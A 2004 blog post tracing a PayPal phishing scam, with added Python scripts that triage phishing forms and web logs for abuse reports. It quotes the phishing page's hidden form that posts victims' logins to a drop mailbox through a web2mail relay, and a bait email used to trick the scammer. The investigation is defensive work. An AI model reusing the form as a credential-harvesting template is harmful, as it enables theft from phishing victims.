ImperialViolet

Tracking down a PayPal scammer (02 May 2004)

I was bored last night (you know, revision, makes you do strange things...). So I actually opened one of those scam PayPal emails:

It has come to our attention that your PayPal account information needs to be updated as part of our continuing commitment to protect your account and to reduce the instance of fraud on our website. If you could please take 5-10 minutes out of your online experience and update your personal records you will not run into any future problems with the online service.

The link text is at www.paypal.com, but the destination is http://210.120.9.236/paypal/login.htm. That's a Solaris box running every service under the sun. I've no doubt that it's a hacked box, so I've emailed the netblock owner (no answer). I also emailed the netblock owner for the host where the email came from - pretty prompt answer from them (they are looking into it). But let's have a look at the HTML from the scam page (which looks identical to a real PayPal page):

<FORM action=http://www.i-st.net/cgi-bin/web2mail.cgi method=post>
<INPUT type=hidden value=mirub@linuxmail.org name=.email_target>
<INPUT type=hidden value=username-password name=.mail_subject>
<INPUT type=hidden value=http://210.120.9.236/paypal/loginloading.htm name=.thanks_url>

Basically, it's emailing him via linuxmail.org (I've emailed linuxmail and told them this). But that's about as far as I can go. I can't find out who is reading that email account. Or can I?
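Pulling those hidden fields out by hand works for one page, but a phishing kit usually has several forms and the interesting values (drop mailbox, relay script, post-submit redirect) are scattered among them. The following is an added example, not code from the original post: it parses a saved copy of such a page with Python's standard-library HTML parser and reports, per form, where credentials are posted, which hidden values look like a drop mailbox, and where the victim is bounced afterwards. The sample page is constructed from the fragment quoted above; the login_email and login_password inputs are assumed, since the post does not show them.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: the form quoted in the post, plus assumed credential inputs.
SAMPLE_PAGE = """
<HTML><BODY>
<FORM action=http://www.i-st.net/cgi-bin/web2mail.cgi method=post>
<INPUT type=hidden value=mirub@linuxmail.org name=.email_target>
<INPUT type=hidden value=username-password name=.mail_subject>
<INPUT type=hidden value=http://210.120.9.236/paypal/loginloading.htm name=.thanks_url>
<INPUT type=text name=login_email>
<INPUT type=password name=login_password>
<INPUT type=submit value="Log In">
</FORM></BODY></HTML>
"""


class FormExtractor(HTMLParser):
    """Collects every <form> with its action/method, hidden values and visible field names."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # html.parser already lowercases tag and attribute names
        if tag == "form":
            self._current = {
                "action": a.get("action", ""),
                "method": (a.get("method") or "get").lower(),
                "hidden": {},
                "fields": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            name = a.get("name", "")
            if (a.get("type") or "text").lower() == "hidden":
                self._current["hidden"][name] = a.get("value", "")
            elif name:  # unnamed inputs (submit buttons) carry no data
                self._current["fields"].append(name)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def triage_forms(html):
    """Summarise each form: relay host, drop mailboxes, redirect and credential fields."""
    parser = FormExtractor()
    parser.feed(html)
    parser.close()
    findings = []
    for form in parser.forms:
        hidden_values = list(form["hidden"].values())
        findings.append({
            "action_host": urlsplit(form["action"]).hostname or "",
            "method": form["method"],
            # Any hidden value containing '@' is a candidate drop mailbox.
            "drop_mailboxes": [v for v in hidden_values if "@" in v],
            # A hidden URL is where the victim is sent after submitting.
            "redirect": next((v for v in hidden_values if v.startswith("http")), None),
            "credential_fields": form["fields"],
        })
    return findings


if __name__ == "__main__":
    for finding in triage_forms(SAMPLE_PAGE):
        print(finding)
```

Everything the script reports is something to hand to an abuse desk: the relay host (the web2mail operator), the mailbox that receives the credentials, and the redirect target, which is usually the same compromised host serving the kit.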

Subject: New remote root exploit for OpenSSH 3.7.x
To: mirub@linuxmail.org
From: xyz@abc.com

I hear that you're an elite hacker. I'd like to share exploits with you, so as
a gesture of good faith (to get the ball rolling) this exploit is doing the
blackhat rounds but hasn't hit the mainstream yet. Many juicy boxes are running
vulnerable sshds:

http://www.doc.ic.ac.uk/~guest01/openssh-xploit.c

Hope to hear from you...

And the contents of http://www.doc.ic.ac.uk/~guest01/openssh-xploit.c:

Well, that'll be your IP in the weblogs.

Cheers.

And indeed:

62.162.228.219 - - [02/May/2004:11:54:26 +0100] "GET /~guest01/openssh-xploit.c HTTP/1.1" 200 51 "http://adsfree.linuxmail.org/scripts/mail/mesg.mail?folder=INBOX&order=Newest&mview=a&mstart=1&.popup=0&msg_uid=1083452662&mprev=1083452665&mnext=1083452657" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"

inetnum:      62.162.224.0 - 62.162.255.255
netname:      MTnet-ADSL_subnet
descr:        ADSL subnet
descr:        Skopje, Macedonia
country:      MK

Very little chance of getting him in Macedonia. Oh well, at the very least he probably wet himself :)
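What makes the log line above conclusive is not just the source IP but the Referer: the browser handed over the linuxmail webmail URL, including the folder and message id it was reading. The following is an added example, not code from the original post: it parses Apache combined-format log records (assumed to be the format the web server wrote), keeps only successful fetches of the bait path, and splits the Referer so the webmail host and message parameters can be read off. The sample log is constructed from the record quoted above, joined onto one line, plus two made-up records so the filter has something to discard and a hit without a Referer to show the difference. The netblock lookup is left to the real whois tool.

```python
import re
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

# Apache/NCSA "combined" log format (assumption: this is what the server wrote).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log: an unrelated crawler hit, a bait fetch with no Referer
# (say, the author checking the file), and the record quoted in the post.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/May/2004:11:50:02 +0100] "GET /robots.txt HTTP/1.0" 200 48 "-" "ExampleBot/1.0"',
    '203.0.113.5 - - [02/May/2004:11:30:00 +0100] "GET /~guest01/openssh-xploit.c HTTP/1.1" 200 51 '
    '"-" "Mozilla/5.0 (X11; Linux)"',
    '62.162.228.219 - - [02/May/2004:11:54:26 +0100] "GET /~guest01/openssh-xploit.c HTTP/1.1" 200 51 '
    '"http://adsfree.linuxmail.org/scripts/mail/mesg.mail?folder=INBOX&order=Newest&mview=a&mstart=1'
    '&.popup=0&msg_uid=1083452662&mprev=1083452665&mnext=1083452657" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"',
]


def parse_combined(line):
    """Parse one combined-format record into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["referer"] = None if rec["referer"] == "-" else rec["referer"]
    return rec


def bait_hits(log_lines, bait_path):
    """Return successful fetches of bait_path, with the Referer split into host and query."""
    hits = []
    for line in log_lines:
        rec = parse_combined(line)
        if rec is None or rec["path"] != bait_path or rec["status"] != 200:
            continue
        ref = urlsplit(rec["referer"]) if rec["referer"] else None
        hits.append({
            "ip": rec["ip"],
            "when": rec["ts"].isoformat(),
            "referer_host": ref.hostname if ref else None,
            # parse_qs gives lists; the first value is all we need here.
            "referer_query": {k: v[0] for k, v in parse_qs(ref.query).items()} if ref else {},
            "user_agent": rec["ua"],
        })
    return hits


if __name__ == "__main__":
    for hit in bait_hits(SAMPLE_LOG, "/~guest01/openssh-xploit.c"):
        print(hit)
```

The hit with no Referer is reported too, because an IP alone is weak evidence; the one whose Referer points at a webmail session on the provider that hosts the drop mailbox is the record worth forwarding, together with the whois output, to the provider's abuse contact.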